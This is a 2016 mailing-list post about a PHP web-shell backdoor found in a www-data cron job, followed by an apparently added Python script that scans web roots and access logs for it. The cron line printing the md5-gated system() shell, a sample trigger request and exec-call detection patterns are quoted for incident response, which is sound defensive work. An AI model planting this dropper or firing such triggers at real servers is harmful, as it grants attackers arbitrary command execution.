[Systems] Found a backdoor

Sebastian Silva sebastian at fuentelibre.org
Thu Feb 25 07:09:26 EST 2016


Remember in June we had an incident with a broken Wordpress site.
I switched to a static generator after that.

+1 on containers; I'm just learning more about them and finding them fascinating.
Count me in on containerizing everything.

I'm not aware of other Wordpress sites. Maybe Walter's blog?
Wordpress is a PIA IMHO.

Regards,
Sebastian


On 25/02/16 04:47, Bernie Innocenti wrote:
> While I was looking for cronjobs in /var/spool/cron/crontabs/, i found
> that www-data was executing commands like these:
>
> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>
> Did you spot the system()? This executes arbitrary commands specified
> via the "localtime" url parameter. Uh-oh.
>
> There were about a dozen lines like the above, installing .cache.php in
> various virtualhosts. I kept a copy of the file in
> /root/www-data.backdoor. The file was last written on Jun 23  2015,
> which may correlate with the switch to the new website.
>
> I cleared the mess and searched the logs for requests containing
> "localtime", but couldn't find any. I wonder if they could filter the
> logs, since they were previously writable by www-data.
>
> Please watch out. We should ensure directories accessible over http are
> not writable by user www-data, especially those in which PHP and CGIs
> are enabled.
>
> Running several large sites under the same uid has always been a bad
> security practice, and looking forward we should keep migrating them to
> properly isolated containers.
>
> Finally, Wordpress is particularly dangerous and we should update and
> harden all instances. Can someone please take care of this? I'll do
> Mediawiki, which I know pretty well.
>

-- 
R&D SomosAzucar.Org
"icarito" #somosazucar on Freenode IRC
"No one liberates anyone, and no one liberates themselves alone. Human beings liberate themselves in communion." - P. Freire
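The quoted message describes the mechanics (a cron entry under www-data rewrites .cache.php every 27 minutes; the PHP gates on the first six hex digits of md5($_GET["localdate"]) and passes $_GET["localtime"], with "@" swapped for spaces, to system()) and the hunt that followed (a grep of the access logs for "localtime"). The script below is an added example for this archive page, not code from the thread or from SomosAzucar: it re-implements the gate so a captured request can be checked, scans a web root for PHP files that feed request data into an exec-style call, and hunts access-log lines for the dropped file name as well as the two parameters (keying on ".cache.php" catches probes that a "localtime" grep alone would miss). It assumes combined-format access logs; the prefix and payload shape come from the quoted cron line, while every file, log line and IP address is constructed for the demo.

```python
"""Hunting helpers for the www-data cron backdoor quoted above.

Added example; not code from the thread or from SomosAzucar. Assumes
Apache/nginx combined-format access logs and a web root of PHP files.
Every file, log line and address below is constructed for the demo; only
the trigger prefix and payload shape come from the quoted cron line.
"""
import hashlib
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

TRIGGER_PREFIX = "6fbcb8"  # hard-coded md5 prefix in the quoted .cache.php

# The quoted payload, used only to seed the demo tree.
QUOTED_PAYLOAD = ('<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") '
                  '{ $time = str_replace("@"," ",$_GET["localtime"]); '
                  '@system($time); exit; } ?>')

# Request data flowing into a command-execution call. Broader than the one
# file seen here on purpose: a redeploy can change file name and params.
EXEC_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
LOG_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')


def scan_php_tree(root):
    """Return root-relative paths of .php files that read request data and
    call an exec-style function. os.walk lists dot-files, so .cache.php is seen."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if EXEC_CALL.search(src) and REQUEST_INPUT.search(src):
                hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def gate_prefix(localdate):
    """substr(md5($_GET["localdate"]), 0, 6) as the PHP computes it."""
    return hashlib.md5(localdate.encode()).hexdigest()[:6]


def would_trigger(query, prefix=TRIGGER_PREFIX):
    """Re-run the backdoor's gate on a URL query string. Returns the command
    system() would receive, or None when the md5 check fails."""
    params = parse_qs(query, keep_blank_values=True)  # decodes %xx like $_GET
    localdate = params.get("localdate", [""])[0]
    if gate_prefix(localdate) != prefix:
        return None
    # str_replace("@", " ", $_GET["localtime"]): '@' stands in for a space
    return params.get("localtime", [""])[0].replace("@", " ")


def hunt_access_log(lines, prefix=TRIGGER_PREFIX):
    """Flag requests that touch the dropped file name or carry either
    parameter, whether or not the gate would have passed."""
    findings = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        params = parse_qs(url.query, keep_blank_values=True)
        if (url.path.endswith("/.cache.php") or "localdate" in params
                or "localtime" in params):
            findings.append((url.path, would_trigger(url.query, prefix)))
    return findings


# Constructed combined-format log lines (RFC 5737 documentation addresses).
CONSTRUCTED_LOG = [
    '203.0.113.5 - - [23/Jun/2015:03:14:07 +0000] "GET /blog/.cache.php'
    '?localdate=&localtime=uname@-a HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [23/Jun/2015:03:15:00 +0000] "GET /blog/index.php?p=1'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Jun/2015:03:16:22 +0000] "POST /wp-login.php'
    ' HTTP/1.1" 200 3300 "-" "-"',
]


def demo_scan():
    """Build a throwaway web root: a benign page, a page running a fixed
    command, and the dropped shell. Only the shell should be reported."""
    with tempfile.TemporaryDirectory() as root:
        blog = os.path.join(root, "blog")
        os.makedirs(blog)
        with open(os.path.join(blog, "index.php"), "w") as fh:
            fh.write('<?php echo htmlspecialchars($_GET["q"]); ?>')
        with open(os.path.join(blog, "status.php"), "w") as fh:
            fh.write('<?php system("uptime"); ?>')
        with open(os.path.join(blog, ".cache.php"), "w") as fh:
            fh.write(QUOTED_PAYLOAD)
        return scan_php_tree(root)


if __name__ == "__main__":
    print("suspicious files:", demo_scan())
    for path, cmd in hunt_access_log(CONSTRUCTED_LOG):
        print("request to", path, "would run:", cmd)
```

On a real host, point scan_php_tree at each virtualhost's document root and feed hunt_access_log the access logs for every site that received a .cache.php copy. The write-permission check the message asks for is a one-liner from the web user's own point of view, `sudo -u www-data find /srv -writable \( -type d -o -name '*.php' \)`, and `crontab -u www-data -l` shows whether the dropper is still scheduled; note that a request which passes the md5 gate runs its command and is the one worth escalating, but any request to the dropped file name is evidence of a probe.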
